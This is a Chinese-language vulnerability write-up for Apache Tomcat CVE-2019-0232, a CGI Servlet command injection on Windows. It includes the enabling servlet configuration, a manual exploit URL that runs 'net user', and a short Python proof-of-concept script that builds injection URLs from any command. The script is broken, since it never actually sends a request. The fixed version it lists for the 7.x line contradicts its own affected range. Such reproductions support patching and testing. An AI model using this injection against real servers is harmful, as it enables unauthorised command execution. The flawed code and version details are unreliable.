ApacheTomcatCVE-2019-0232远程代码执⾏漏洞
漏洞简介2019年4⽉10⽇,Apache Tomcat报告了⼀个漏洞,报告中称在windows上运⾏的Apache Tomcat存在远程代码执⾏漏洞,漏洞编号为CVE-2019-0232。在Windows平台,远程攻击者向CGI Servlet发送⼀个精⼼设计的请求,在具有Apache Tomcat权限的系统上注⼊和执⾏任意操作系统命令。漏洞成因是当将参数从JRE传递到Windows环境时,由于CGI_Servlet中的输⼊验证错误⽽存在该漏洞。CGI_Servlet默认是关闭的。
影响范围
Apache Tomcat 9.0.0.M1 to 9.0.17
Apache Tomcat 8.5.0 to 8.5.39
Apache Tomcat 7.0.0 to 7.0.93
漏洞复现
测试环境
Tomcat 8.5.39
JDK 8u121
0X00修改配置⽂件
<servlet>
<servlet-name>cgi</servlet-name>
<servlet-class>org.apache.catalina.servlets.CGIServlet</servlet-class>
<init-param>
<param-name>debug</param-name>
<param-value>0</param-value>
</init-param>
<init-param>
<param-name>cgiPathPrefix</param-name>
<param-value>WEB-INF/cgi-bin</param-value>
</init-param>
<init-param>
<param-name>executable</param-name>
<param-value></param-value>
</init-param>
<load-on-startup>5</load-on-startup>
</servlet>
<!-- The mapping for the CGI Gateway servlet -->
<servlet-mapping>
<servlet-name>cgi</servlet-name>
<url-pattern>/cgi-bin/*</url-pattern>
</servlet-mapping>
<Context privileged="true">
<!-- Default set of monitored resources. If one of these changes, the -->
<!-- web application will be reloaded. -->
<WatchedResource>l</WatchedResource>
<WatchedResource>${catalina.base}/l</WatchedResource>
<!-- Uncomment this to disable session persistence across Tomcat restarts -->
<!--
<Manager pathname="" />
-->
</Context>
将WEB-INF ⽂件移动到 /webapps/ROOT 然后启动tomcat,WEB-INF以下参考链接可以下载到。⼿动测试:
127.0.0.1:8080/cgi-bin/hello.bat?&C%3A%5CWindows%5CSystem32%5Cnet%20user
cve漏洞库poc
import requests
import sys
# localhost:8080/cgi-bin/hello.bat?&C%3A%5CWindows%+user
url = sys.argv[1]
url_dir = "/cgi-bin/hello.bat?&C%3A%5CWindows%5CSystem32%5C"
cmd = sys.argv[2]
vuln_url = url + url_dir +cmd
print ("Usage: python CVE-2019-0232.py url cmd")
print ("The Vuln url:\n\n" ,vuln_url)
r = (vuln_url)
print("\nThe Vuln Response Content: \n\n" , r.text)
修复措施
受影响版本的⽤户应该应⽤下列其中⼀项缓解。升级到:Apache Tomcat 9.0.18或更⾼版本
Apache Tomcat 8.5.40或更⾼版本
Apache Tomcat 7.0.93或更⾼版本
参考链接
测试环境及更多漏洞关注:
版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系QQ:729038198,我们将在24小时内删除。
发表评论